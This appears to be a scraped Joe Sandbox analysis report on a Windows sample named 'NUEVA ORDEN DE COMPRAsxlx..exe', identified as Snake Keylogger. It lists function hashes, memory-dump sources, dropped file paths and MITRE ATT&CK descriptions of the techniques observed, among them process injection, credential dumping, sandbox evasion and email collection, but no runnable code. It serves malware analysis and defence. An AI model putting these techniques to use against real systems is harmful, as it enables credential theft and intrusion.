Opcode Fuzzy Hash: cc04e78daa39ec78f75180993895072302ac28201d82ccfa83d24b6be944519e
Instruction Fuzzy Hash: 08C19E74E00218CFEB14DFA5D994B9DBBB2FF89305F2090A9D409AB395DB359A85CF10

Function 00E44C38 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2533969284.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b54dcdbdf5b49796f250871d16e55d8169b0ad0f22131b7e161f146b8d8409f
Instruction ID: 0b27351c64d67110713be368228fce0c719c84bfd515628d531489a98948bd00
Opcode Fuzzy Hash: 5b54dcdbdf5b49796f250871d16e55d8169b0ad0f22131b7e161f146b8d8409f
Instruction Fuzzy Hash: F6C19D74E00218CFEB14DFA5D994B9DBBB2FF89301F2090A9D409AB395DB359A85DF10

Function 00E42DA8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2533969284.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7cdd8b0ed0d3a2613d9a14681919712753c49ccc710add09587296a0390b755
Instruction ID: 2e8d2af5865b7672ac4dbec153b880c3e34dc5d4cd3573e7c8bf674b03de6f1c
Opcode Fuzzy Hash: d7cdd8b0ed0d3a2613d9a14681919712753c49ccc710add09587296a0390b755
Instruction Fuzzy Hash: 25C1AE74E00218CFEB14DFA5D994B9DBBB2FF89301F2090A9D409AB395DB359A85CF10

Function 00E43F08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2533969284.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d66d0e974ef35bad3fe18432a93e9bdadbc1257bac46906875f6a271477ea3e7
Instruction ID: 6de1fb33e7eeee65d310cc584f684963e6ed372e0fe71fdaf80d326d6dac5fff
Opcode Fuzzy Hash: d66d0e974ef35bad3fe18432a93e9bdadbc1257bac46906875f6a271477ea3e7
Instruction Fuzzy Hash: 73C1AD74E00218CFEB14DFA5D994B9DBBB2FF89301F2090A9D409AB395DB359A81DF10

Function 00E40B48 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2533969284.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6665da5281af621357c7cd2b39364e5d7ae02217b200be34924dba2414c9dc86
Instruction ID: 800f12e2ece1fa6edc407f1eb0c544c65728091c59ee451a4adcb56ea77f1d3f
Opcode Fuzzy Hash: 6665da5281af621357c7cd2b39364e5d7ae02217b200be34924dba2414c9dc86
Instruction Fuzzy Hash: 95B16374E10218CFDB54DFA9D994A9DBBB2FF89310F1081A9D819AB365DB30AD42CF50

Function 00E40B38 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2533969284.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f39aa6f12867465f916d750c2ac04986ffc76929e207bb547e6c844cc0313fe
Instruction ID: 79b4f23d3d0e6a4d5e1220cd1914ae047f613fddaf72dd2104954d8138db1b4a
Opcode Fuzzy Hash: 2f39aa6f12867465f916d750c2ac04986ffc76929e207bb547e6c844cc0313fe
Instruction Fuzzy Hash: B3519475E00608CFDB18DFAAD484A9DBBF2FF89300F149569D418AB365EB309942CF10

Analysis Process: .exePID: 8036, Parent PID: 640COMMON

Executed Functions

Function 00DB1340 Relevance: .6, Instructions: 602COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1541388559.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_db0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 804882145d374ed52204eee2cc5af46e3833e91b3a46538d512d498ecb7a984b
Instruction ID: 025626208ca86a4a1baedf79003037131d42e63a3731f9b8dd917eb398437a75
Opcode Fuzzy Hash: 804882145d374ed52204eee2cc5af46e3833e91b3a46538d512d498ecb7a984b
Instruction Fuzzy Hash: 51328038700602CFD714EF24D8A06AAB7E2BB89345B54496ED4478B399FF75EC42CB51

Function 00DB0BC0 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1541388559.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_db0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e483af7f50fa4a94f6064b73670e78d47411dfb979ad8d573589031c9d668c40
Instruction ID: cb3fdc3bef0ee9dba8440b75fb98ee287dd7652216b41ce4d1395ec73736c8fd
Opcode Fuzzy Hash: e483af7f50fa4a94f6064b73670e78d47411dfb979ad8d573589031c9d668c40
Instruction Fuzzy Hash: B781AF35A00701CFDB16ABA0D4187AEBBF2BF89300F15855AE443A77A1EF75AC85DB50

Function 00DB1230 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1541388559.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_db0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84c496e2399cbb84e82b631c26c683c6ae3eda6b8707b2178f33bfa578e2c081
Instruction ID: ad2328d1062cddadc4d4a9a068ff6643c74ce802b20d54af48587676aa160ae7
Opcode Fuzzy Hash: 84c496e2399cbb84e82b631c26c683c6ae3eda6b8707b2178f33bfa578e2c081
Instruction Fuzzy Hash: 7F31E334340611CFC759AB38C45891D3BE2AF8AB1536508A8E506CF371DE36DC42CB90

Function 00DB1240 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1541388559.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_db0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07053a02880f1c10e1455148a5188ce7e8545f9f72bc46f5e1ac01b3aeb0729f
Instruction ID: e5624a778d4d43603e3208c664778ce18c30fd6353ebdedd388bb8f4bfba3592
Opcode Fuzzy Hash: 07053a02880f1c10e1455148a5188ce7e8545f9f72bc46f5e1ac01b3aeb0729f
Instruction Fuzzy Hash: 8921C035740211CFC758AF39C49891D77E6AF8AB163A548A8E506CF371EE36DC428B90

Function 00DB1C00 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1541388559.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_db0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93a4d162db87c70cecab9ab8a0ea1512e9c67ad3fec0899089559d05da1b01de
Instruction ID: 0fcb7b4c50c00a9aa5b8e35308544d47f9d66aa61beead1f7a5fa685b3b9d519
Opcode Fuzzy Hash: 93a4d162db87c70cecab9ab8a0ea1512e9c67ad3fec0899089559d05da1b01de
Instruction Fuzzy Hash: F8118275E002469FCB01EFB4E8448DFFBB1FF8930071186AAE409D7261E7719919CBA0

Function 00DB1C10 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1541388559.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_db0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c90332e084b7dccde87700f936680d64d585068f02d31f5337b45ca6ac46a39d
Instruction ID: f6782d153b7c691cf6c087ab1ce3f4ec27c22d93ea6fa2fd509366eaa796d736
Opcode Fuzzy Hash: c90332e084b7dccde87700f936680d64d585068f02d31f5337b45ca6ac46a39d
Instruction Fuzzy Hash: 64015276E00606DFCB40EFB8D84489FFBB5FF8931071186A6E519D7221EB71A915CBA0

Function 00DB0880 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1541388559.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_db0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ebdb3fce9cb594a6c21c7335efd79a939b0c8b4199dc26f39c0b7da27cb4ab0
Instruction ID: d4055978e8eb33f629865e193d8c53cfc41495fa1af24ce54249e65cb04bcf3f
Opcode Fuzzy Hash: 9ebdb3fce9cb594a6c21c7335efd79a939b0c8b4199dc26f39c0b7da27cb4ab0
Instruction Fuzzy Hash: 38F030B490A7899FCB029BB4A9141CA7FB0AE0A300B1605E7C5C5DB262E7344A1DD792

Function 00DB0F9D Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1541388559.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_db0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3691e514dfb5e11f3b83b037b7e96308d60fa164a6883b62eca7ba2fd0b5d68d
Instruction ID: 6bffebb0b9f79d954b2b129554f895729bbf1ee9f08c2707358942588936bda4
Opcode Fuzzy Hash: 3691e514dfb5e11f3b83b037b7e96308d60fa164a6883b62eca7ba2fd0b5d68d
Instruction Fuzzy Hash: C8F01C74A04305CFDB14DB68C5687AE7BF0AF08744F240859D543AB3A0DFB58D84CB60

Function 00DB1AE0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1541388559.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_db0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9c0d289d51dcd377bb56821593562e97cc2f5d9ba734a69408731854f949fe0
Instruction ID: 4b8e38afb4bb19b3e8569e77f010dbe8d0e328e3308b0ac5943ce3cdd7a10ef4
Opcode Fuzzy Hash: c9c0d289d51dcd377bb56821593562e97cc2f5d9ba734a69408731854f949fe0
Instruction Fuzzy Hash: 65D012357102149FC710EB64E959A8577789B09611F514096E5098B251EB62EC14CBE1

Function 00DB08A8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1541388559.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_db0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 219e30edfeda2c62479e1337632ae92998edf8fd4dad6a45eb21462671a4b345
Instruction ID: 5a7fee4c55991e253f2b0fdde0baef91264e922f2fa96ba45149e3852ae9608c
Opcode Fuzzy Hash: 219e30edfeda2c62479e1337632ae92998edf8fd4dad6a45eb21462671a4b345
Instruction Fuzzy Hash: 4CD067B5D01219EF8B40EFB999051DEBBF8FE08250B104666D95AE7201F7709B148BE1

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NUEVA ORDEN DE COMPRAsxlx..exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NUEVA ORDEN DE C_f7bac2445179e8f2c312d8977cbf32c417e6_15c0ca2f_f5328e29-51a0-46c5-8335-48b5900a66c4\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3EB3.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4645.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4675.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xiw1g43.whz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34dbr0qw.55s.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aqoqxckf.01r.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnabt4oe.n5g.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqvkcwwr.tfw.psm1

Windows Analysis Report
NUEVA ORDEN DE COMPRAsxlx..exe

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre